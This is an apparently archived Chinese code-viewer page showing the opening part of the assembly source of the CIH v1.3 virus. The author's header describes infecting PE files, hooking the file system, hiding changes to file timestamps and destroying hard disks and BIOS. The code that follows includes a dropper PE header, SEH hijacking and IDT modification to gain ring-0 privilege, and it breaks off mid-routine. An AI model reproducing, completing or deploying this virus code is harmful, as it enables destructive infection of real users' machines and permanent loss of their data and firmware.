📄 3.htm
字号:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<HTML><HEAD><TITLE>CIH v1.3源程序</TITLE>
<META http-equiv=Content-Type content="text/html; charset=gb2312">
<STYLE type=text/css>BODY {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TABLE {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TD {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
INPUT {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
TEXTAREA {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
SELECT {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体"
}
CODE {
FONT-SIZE: 9pt; FONT-FAMILY: "宋体r"
}
A {
COLOR: #005500
}
A:hover {
COLOR: #cc0000
}
.border {
BORDER-RIGHT: #000000 1px solid; BORDER-TOP: #000000 1px solid; LIST-STYLE-POSITION: inside; BORDER-LEFT: #000000 1px solid; BORDER-BOTTOM: #000000 1px solid; LIST-STYLE-TYPE: square; BACKGROUND-COLOR: transparent
}
</STYLE>
<META content="MSHTML 6.00.2600.0" name=GENERATOR></HEAD>
<BODY text=#000000 bgColor=#ffffff>
<TABLE borderColor=#339933 cellSpacing=0 borderColorDark=#ffffff cellPadding=0
width=405 borderColorLight=#000000 border=1>
<TBODY>
<TR vAlign=center bgColor=#009900>
<TD >
<TABLE cellSpacing=0 cellPadding=0 width="100%" border=0>
<TBODY>
<TR>
<TD>
<TABLE width="65%" align=center border=0>
<TBODY>
<TR>
<TD bgColor=#009900>
<DIV align=center><FONT
face="Verdana, Arial, Helvetica, sans-serif"
color=#ffffff><B>CIH v1.3源程序</B></FONT></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
<DIV align=center></DIV>
</TD>
</TR>
</TBODY>
</TABLE>
</TD>
</TR>
<TR vAlign=center align=left bgColor=#cccccc>
<TD></TD>
</TR>
<TR vAlign=top>
<TD class=tenpt><CODE><FONT color=#000000><br>
; ****************************************************************************
<br>
; * The Virus Program Information * <br>
; ****************************************************************************
<br>
; * * <br>
; * Designer : CIH Original Place : TTIT of Taiwan * <br>
; * Create Date : 04/26/1998 Now Version : 1.3 * <br>
; * Modification Time : 05/24/1998 * <br>
; * * <br>
; *==========================================================================*
<br>
; * Modification History * <br>
; *==========================================================================*
<br>
; * v1.0 1. Create the Virus Program. * <br>
; * 2. The Virus Modifies IDT to Get Ring0 Privilege. * <br>
; * 04/26/1998 3. Virus Code doesn't Reload into System. * <br>
; * 4. Call IFSMgr_InstallFileSystemApiHook to Hook File System. * <br>
; * 5. Modifies Entry Point of IFSMgr_InstallFileSystemApiHook. * <br>
; * 6. When System Opens Existing PE File, the File will be * <br>
; * Infected, and the File doesn't be Reinfected. * <br>
; * 7. It is also Infected, even the File is Read-Only. * <br>
; * 8. When the File is Infected, the Modification Date and Time * <br>
; * of the File also don't be Changed. * <br>
; * 9. When My Virus Uses IFSMgr_Ring0_FileIO, it will not Call * <br>
; * Previous FileSystemApiHook, it will Call the Function * <br>
; * that the IFS Manager Would Normally Call to Implement * <br>
; * this Particular I/O Request. * <br>
; * 10. The Virus Size is only 656 Bytes. * <br>
; *==========================================================================*
<br>
; * v1.1 1. Especially, the File that be Infected will not Increase * <br>
; * it's Size... ^__^ * <br>
; * 05/15/1998 2. Hook and Modify Structured Exception Handing. * <br>
; * When Exception Error Occurs, Our OS System should be in * <br>
; * Windows NT. So My Cute Virus will not Continue to Run, * <br>
; * it will Jmup to Original Application to Run. * <br>
; * 3. Use Better Algorithm, Reduce Virus Code Size. * <br>
; * 4. The Virus "Basic" Size is only 796 Bytes. * <br>
; *==========================================================================*
<br>
; * v1.2 1. Kill All HardDisk, and BIOS... Super... Killer... * <br>
; * 2. Modify the Bug of v1.1 * <br>
; * 05/21/1998 3. The Virus "Basic" Size is 1003 Bytes. * <br>
; *==========================================================================*
<br>
; * v1.3 1. Modify the Bug that WinZip Self-Extractor Occurs Error. * <br>
; * So When Open WinZip Self-Extractor ==> Don't Infect it. * <br>
; * 05/24/1998 2. The Virus "Basic" Size is 1010 Bytes. * <br>
; ****************************************************************************
</FONT></CODE>
<p>.586P </p>
<p>; ****************************************************************************
<br>
; * Original PE Executable File(Don't Modify this Section) * <br>
; ****************************************************************************
</p>
<p>OriginalAppEXE SEGMENT </p>
<p>FileHeader: <br>
db 04dh, 05ah, 090h, 000h, 003h, 000h, 000h, 000h <br>
db 004h, 000h, 000h, 000h, 0ffh, 0ffh, 000h, 000h <br>
db 0b8h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 040h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 080h, 000h, 000h, 000h <br>
db 00eh, 01fh, 0bah, 00eh, 000h, 0b4h, 009h, 0cdh <br>
db 021h, 0b8h, 001h, 04ch, 0cdh, 021h, 054h, 068h <br>
db 069h, 073h, 020h, 070h, 072h, 06fh, 067h, 072h <br>
db 061h, 06dh, 020h, 063h, 061h, 06eh, 06eh, 06fh <br>
db 074h, 020h, 062h, 065h, 020h, 072h, 075h, 06eh <br>
db 020h, 069h, 06eh, 020h, 044h, 04fh, 053h, 020h <br>
db 06dh, 06fh, 064h, 065h, 02eh, 00dh, 00dh, 00ah <br>
db 024h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 050h, 045h, 000h, 000h, 04ch, 001h, 001h, 000h <br>
db 0f1h, 068h, 020h, 035h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 0e0h, 000h, 00fh, 001h <br>
db 00bh, 001h, 005h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 010h, 010h, 000h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 020h, 000h, 000h, 000h, 000h, 040h, 000h <br>
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h <br>
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 004h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 020h, 000h, 000h, 000h, 002h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 002h, 000h, 000h, 000h <br>
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 000h, 010h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 010h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 02eh, 074h, 065h, 078h, 074h, 000h, 000h, 000h <br>
db 000h, 010h, 000h, 000h, 000h, 010h, 000h, 000h <br>
db 000h, 010h, 000h, 000h, 000h, 002h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 020h, 000h, 000h, 060h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 000h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
db 0c3h, 000h, 000h, 000h, 000h, 000h, 000h, 000h <br>
dd 00000000h, VirusSize </p>
<p>OriginalAppEXE ENDS </p>
<p>; ****************************************************************************
<br>
; * My Virus Game * <br>
; ****************************************************************************
</p>
<p>; ********************************************************* <br>
; * Constant Define * <br>
; ********************************************************* </p>
<p>TRUE = 1 <br>
FALSE = 0 </p>
<p>DEBUG = TRUE </p>
<p>MajorVirusVersion = 1 <br>
MinorVirusVersion = 3 </p>
<p>VirusVersion = MajorVirusVersion*10h+MinorVirusVersion </p>
<p><br>
IF DEBUG </p>
<p>FirstKillHardDiskNumber = 81h <br>
HookExceptionNumber = 05h </p>
<p>ELSE </p>
<p>FirstKillHardDiskNumber = 80h <br>
HookExceptionNumber = 03h </p>
<p>ENDIF </p>
<p><br>
FileNameBufferSize = 7fh </p>
<p>; ********************************************************* <br>
; ********************************************************* </p>
<p>VirusGame SEGMENT </p>
<p>ASSUME CS:VirusGame, DS:VirusGame, SS:VirusGame <br>
ASSUME ES:VirusGame, FS:VirusGame, GS:VirusGame </p>
<p>; ********************************************************* <br>
; * Ring3 Virus Game Initial Program * <br>
; ********************************************************* </p>
<p>MyVirusStart: <br>
push ebp </p>
<p>; ************************************* <br>
; * Let's Modify Structured Exception * <br>
; * Handing, Prevent Exception Error * <br>
; * Occurrence, Especially in NT. * <br>
; ************************************* </p>
<p>lea eax, [esp-04h*2] </p>
<p>xor ebx, ebx <br>
xchg eax, fs:[ebx] </p>
<p>call @0 <br>
@0: <br>
pop ebx </p>
<p>lea ecx, StopToRunVirusCode-@0[ebx] <br>
push ecx </p>
<p>push eax </p>
<p>; ************************************* <br>
; * Let's Modify * <br>
; * IDT(Interrupt Descriptor Table) * <br>
; * to Get Ring0 Privilege... * <br>
; ************************************* </p>
<p>push eax ; <br>
sidt [esp-02h] ; Get IDT Base Address <br>
pop ebx ; </p>
<p>add ebx, HookExceptionNumber*08h+04h ; ZF = 0 </p>
<p>cli </p>
<p>mov ebp, [ebx] ; Get Exception Base <br>
mov bp, [ebx-04h] ; Entry Point </p>
<p>lea esi, MyExceptionHook-@1[ecx] </p>
<p>push esi </p>
<p>mov [ebx-04h], si ; <br>
shr esi, 16 ; Modify Exception <br>
mov [ebx+02h], si ; Entry Point Address </p>
<p>pop esi </p>
<p>; ************************************* <br>
; * Generate Exception to Get Ring0 * <br>
; ************************************* </p>
<p>int HookExceptionNumber ; GenerateException <br>
ReturnAddressOfEndException = $ </p>
<p>; ************************************* <br>
; * Merge All Virus Code Section * <br>
; ************************************* </p>
<p>push esi <br>
mov esi, eax </p>
<p>LoopOfMergeAllVirusCodeSection: </p>
<p>mov ecx, [eax-04h] </p>
<p>rep movsb </p>
<p>sub eax, 08h </p>
<p>mov esi, [eax] </p>
<p>or esi, esi <br>
jz QuitLoopOfMergeAllVirusCodeSection ; ZF = 1 </p>
<p>jmp LoopOfMergeAllVirusCodeSection </p>
<p>QuitLoopOfMergeAllVirusCodeSection: </p>
<p>pop esi </p>
<p>; ************************************* <br>
; * Generate Exception Again * <br>
; ************************************* </p>
<p>int HookExceptionNumber ; GenerateException Again </p>
<p>; ************************************* <br>
; * Let's Restore * <br>
; * Structured Exception Handing * <br>
; ************************************* </p>
<p>ReadyRestoreSE: <br>
sti </p>
<p>xor ebx, ebx </p>
<p>jmp RestoreSE </p>
<p>; ************************************* <br>
; * When Exception Error Occurs, * <br>
; * Our OS System should be in NT. * <br>
; * So My Cute Virus will not * <br>
; * Continue to Run, it Jmups to * <br>
; * Original Application to Run. * <br>
; ************************************* </p>
<p>StopToRunVirusCode: <br>
@1 = StopToRunVirusCode </p>
<p>xor ebx, ebx <br>
mov eax, fs:[ebx] <br>
mov esp, [eax] </p>
<p>RestoreSE: <br>
pop dword ptr fs:[ebx] <br>
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -